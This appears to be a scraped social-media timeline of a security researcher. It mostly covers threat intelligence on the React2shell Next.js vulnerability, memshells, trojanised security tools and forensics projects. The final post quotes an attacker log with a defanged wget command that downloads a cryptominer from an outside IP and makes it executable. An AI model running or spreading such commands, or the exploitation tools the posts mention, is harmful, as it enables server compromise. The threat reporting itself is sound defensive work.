Arik Nachmias
@M0teki
Followers: 622 | Following: 11K | Media: 190 | Statuses: 3K
CEO & Co-founder - Honey Badger Security / Codeseal / Badgerguard | Incident Responder | https://t.co/IqyBEYtGlc https://t.co/G72VLA6Hdm https://t.co/QLeZuRJqWw
Tel Aviv, Israel
Joined August 2009
THC Release 💥: The world’s largest IP<>Domain database: https://t.co/I9OIucDu2T All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free. Updated monthly. Try: curl https://t.co/HUrGIrdpLd Raw data (187GB): https://t.co/GM3L2DJYKF (The fine work
35
386
2K
We only use LLMs where it makes sense. After ~2 years of testing, the useful spot is working on rich scan telemetry - not just explaining alerts. We feed it the info-level signal in THOR reports (process trees, services, users, tasks, etc.) so it can correlate and surface
Say hello to RuneAI 🤖⚡️ We’ve been working on our internal AI service, RuneAI, for almost a year. Today is the first public showcase of what it does. RuneAI’s job is to sit on top of THOR output and help with triage: take large, messy result streams (often full of low-level or
1
17
167
I’m a bit quieter than usual because I’ve been tinkering with a small open source project… 🤫 It’s about collecting forensic evidence on Linux systems that tend to be awkward in practice - embedded devices, containers, older distros, odd cloud images, etc. - Collector: POSIX
6
40
376
Amazing Tweet. So sad. So true.
1K
12K
115K
Never forget
11K
96K
773K
Here's our new blogpost with a technical deepdive into exploitation we're observing in the wild of CVE-2025-55182 (aka react2shell): https://t.co/jBvMgTqjEO
3
42
96
You'll probably hear the term #memshell more often. It is used for shells (web shells) that get implanted into memory. The most common ones used in the exploitation of #React2shell register two API endpoints that respond to a cmd=xxx command /exec /nodesync example:
1
15
129
Someone helpfully shared yet another "free" THOR build on VT. It’s the real scanner, just repackaged with a .NET stealer and a ScreenConnect dropper on top. We keep an eye on VT uploads of THOR and see this kind of bundle regularly. If you’re running cracked security tools on
1
15
152
I've developed a professional and technical tool for Next.js (CVE-2025-55182) 🥳 I'm offering this tool, which allows you to perform both bulk and individual scans, as well as testing on live subdomains. github; https://t.co/qMOoXmBJ9j
#DevTools #python #bugbountytip
15
176
961
🚨 Critical React & Next.js RCE Vulnerabilities (CVE-2025-55182 & CVE-2025-66478) Both CVSS 10.0 A severe flaw in React Server Components and Next.js enables unauthenticated Remote Code Execution across millions of exposed applications. FOFA: ▪️Query: app="NEXT.JS" ||
3
66
337
Pretty much
17K
36K
314K
A story as old as time. Sadly the industry places WAFs as this magical Harry Potter coat of invisibility and in reality….
Vercel is questioning whether or not a WAF bypass is possible... Pushed an update that uses a payload from @SLCyberSec research team (specifically @hash_kitten). Payload has been running for @assetnote customers for last 18h. https://t.co/9CqANckHK0 use --vercel-waf-bypass flag
5
7
84
i've been hacked and traced the malware's wallet to see how much money they actually made from this new exploit (if you use Next.js/React, READ THIS!) I woke up to a terrifying email from Hetzner: "Netscan Detected." my server was blocked and a botnet was using my IP to
273
884
5K
Never hire criminals. They don’t have the core values needed for a job like that.
5
14
155
Here are my Opus 4.5 thoughts after ~2 weeks of use. First some general thoughts, then some practical stuff. --- THE BIG PICTURE --- THE UNLOCK FOR AGENTS It's clear to anyone who's used Opus 4.5 that AI progress isn't slowing down. I'm surprised more people aren't treating
166
271
3K
🚨@zachxbt is reporting that the British threat actor known as Danny/Meech, believed to be Danish Zulfiqar (Khan), appears to have been arrested, with law enforcement likely seizing his crypto assets. Roughly $18.58M, at the time of Zach's post, is now sitting in
26
84
847
Someone emailed me a log from a VPS with a vulnerable NextJS version that was presumably compromised by React2Shell. Unsure if others are seeing similar, but seems to be dumbo cryptominer. - ping 45.157.233[.]80 - wget http[:]//45.76.155[.]14/vim -O /tmp/vim ; chmod +x
22
92
792